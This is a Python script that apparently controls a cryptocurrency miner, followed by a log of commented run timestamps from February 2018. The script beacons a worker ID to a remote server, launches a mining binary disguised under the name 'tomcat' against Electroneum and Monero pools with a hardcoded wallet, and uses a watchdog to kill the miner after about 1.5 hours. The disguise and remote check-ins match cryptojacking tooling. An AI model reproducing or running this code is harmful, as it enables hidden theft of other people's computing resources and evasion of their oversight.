import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:36:01.682178
#2018-02-17 17:23:07.362360
#2018-02-17 19:12:03.472802
#2018-02-17 21:02:01.659971
#2018-02-17 22:46:07.566371
#2018-02-18 00:32:05.654303
#2018-02-18 02:22:01.856716
#2018-02-18 04:09:07.098774
#2018-02-18 06:01:07.697568
#2018-02-18 07:51:07.951070
#2018-02-18 09:39:05.030412
#2018-02-18 11:25:06.687407
#2018-02-18 13:11:07.983244
#2018-02-18 14:59:06.236799
#2018-02-18 16:48:05.412007
#2018-02-18 18:36:04.831313
#2018-02-18 20:23:06.711946
#2018-02-18 22:09:06.399348
#2018-02-18 23:57:04.499471
#2018-02-19 01:43:04.596760
#2018-02-19 03:31:07.873634
#2018-02-19 05:15:05.846679
#2018-02-19 07:02:04.747106
#2018-02-19 08:49:04.107345
#2018-02-19 10:39:04.552558
#2018-02-19 12:26:07.130473
#2018-02-19 14:13:07.023783
#2018-02-19 16:02:08.021679
#2018-02-19 17:49:08.820351
#2018-02-19 19:37:07.413281
#2018-02-19 21:24:05.467359
#2018-02-19 23:10:06.666315
#2018-02-20 00:55:03.031943
#2018-02-20 02:43:07.707177
#2018-02-20 04:32:04.881104
#2018-02-20 06:15:09.495218
#2018-02-20 08:01:06.950131
#2018-02-20 09:47:04.684746
#2018-02-20 11:31:08.585615
#2018-02-20 13:17:01.813874
#2018-02-20 15:03:06.165369
#2018-02-20 16:48:07.114955
#2018-02-20 18:37:08.376612
#2018-02-20 20:27:02.228858
#2018-02-20 22:12:01.580991
#2018-02-20 23:54:05.457203
#2018-02-21 01:39:06.065928
#2018-02-21 03:27:04.441857
#2018-02-21 05:15:02.059982
#2018-02-21 07:03:02.063154
#2018-02-21 08:48:07.831944
#2018-02-21 10:34:01.517457
#2018-02-21 12:22:06.524051
#2018-02-21 14:08:06.660908
#2018-02-21 15:53:07.138851
#2018-02-21 17:47:02.032444
#2018-02-21 19:32:01.640078
#2018-02-21 21:19:03.700779
#2018-02-21 23:05:08.392077
#2018-02-22 00:55:08.870059
#2018-02-22 02:43:06.415395
#2018-02-22 04:30:01.475911
#2018-02-22 06:16:01.461701
#2018-02-22 08:02:01.953441
#2018-02-22 09:50:10.553368
#2018-02-22 11:35:11.627895
#2018-02-22 13:22:05.995733
#2018-02-22 15:09:07.607800
#2018-02-22 16:53:11.722034
#2018-02-22 18:41:07.644193
#2018-02-22 20:34:01.976077
#2018-02-22 22:19:03.773110
#2018-02-23 00:05:08.464736
#2018-02-23 01:52:06.811874
#2018-02-23 03:40:08.994421
#2018-02-23 05:25:08.149954
#2018-02-23 07:11:05.058853
#2018-02-23 09:14:07.957044
#2018-02-23 11:21:08.740770
#2018-02-23 13:11:05.267500
#2018-02-23 14:56:06.982861
#2018-02-23 16:44:06.032946
#2018-02-23 18:31:09.593167
#2018-02-23 20:16:05.482323
#2018-02-23 22:06:06.675121
#2018-02-23 23:54:06.243502
#2018-02-24 01:43:01.533140
#2018-02-24 03:34:06.067702
#2018-02-24 05:18:06.271309
#2018-02-24 07:07:01.831411
#2018-02-24 08:53:06.896925
#2018-02-24 10:53:04.874600
#2018-02-24 12:41:02.216600
#2018-02-24 14:29:04.778419
#2018-02-24 16:17:04.017883
#2018-02-24 18:11:05.202517
#2018-02-24 19:57:04.457585
#2018-02-24 21:41:01.309656
#2018-02-25 00:33:05.099998
#2018-02-25 04:17:01.492906
#2018-02-25 07:47:05.818294